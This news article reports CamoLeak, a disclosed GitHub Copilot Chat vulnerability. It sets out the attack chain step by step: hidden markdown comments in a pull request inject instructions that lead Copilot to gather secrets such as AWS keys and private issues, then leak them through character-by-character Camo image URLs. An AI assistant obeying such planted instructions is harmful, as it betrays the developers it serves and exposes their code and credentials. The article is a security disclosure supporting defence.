Skip to main content
Security 3 min read 466 views

CamoLeak: Critical GitHub Copilot Flaw Allowed Silent Exfiltration of Private Code and Secrets

A CVSS 9.6 vulnerability in GitHub Copilot Chat combined remote prompt injection with a CSP bypass via GitHub's Camo image proxy, enabling attackers to silently exfiltrate AWS keys and private repository data through hidden markdown comments.

TD

TechDrop Editorial

Share:

Security researcher Omer Mayraz of Legit Security disclosed CamoLeak, a critical vulnerability in GitHub Copilot Chat with a CVSS score of 9.6, that demonstrated how AI coding assistants can be weaponized to silently exfiltrate private code and secrets from the repositories they are designed to help developers work on.

The Attack Chain

CamoLeak combined two techniques: remote prompt injection and a Content Security Policy (CSP) bypass via GitHub's Camo image proxy. The attack began with a hidden markdown comment planted in a pull request description. When a developer asked Copilot Chat a question about the pull request, the hidden comment injected malicious instructions into Copilot's context — instructions that the developer could not see in the rendered PR description.

The injected instructions directed Copilot to access sensitive information from the repository — private issue descriptions, environment variables, configuration files — and encode that information as a series of image URLs using GitHub's Camo proxy. The Camo proxy, which GitHub uses to serve external images through its own domain for security purposes, was repurposed as a data exfiltration channel. Pre-generated Camo URLs corresponding to ASCII characters allowed the attacker to reconstruct the stolen data from the proxy's access logs.

What Could Be Stolen

Legit Security demonstrated exfiltration of AWS access keys, security tokens, and private issue descriptions — including undisclosed zero-day vulnerability details — from private repositories. The attack required no access to the victim's machine, no malware installation, and no credential theft. The only requirement was the ability to create a pull request in a repository where a developer would subsequently interact with Copilot Chat — a scenario that is routine in open-source projects and common in enterprise development workflows that accept external contributions.

Mitigation

GitHub mitigated CamoLeak by disabling image rendering in Copilot Chat entirely on August 14, 2025. The fix eliminates the exfiltration channel by preventing Copilot from rendering images — including the data-encoding Camo URLs — in its responses. The vulnerability was originally discovered in June 2025 and publicly disclosed in early 2026 after the fix was deployed.

Broader Implications

CamoLeak is distinct from CVE-2026-21516, a separate GitHub Copilot vulnerability in the JetBrains plugin that was patched in the February 2026 Patch Tuesday. Together, the two vulnerabilities establish that AI coding assistants represent a genuinely new attack surface — one in which the AI itself can be manipulated to act against the user's interests through prompt injection attacks embedded in the code the AI is analyzing. For security teams evaluating AI coding tool deployments, CamoLeak demonstrates that the risk model must account for the AI acting as an unwitting insider threat.

Related Articles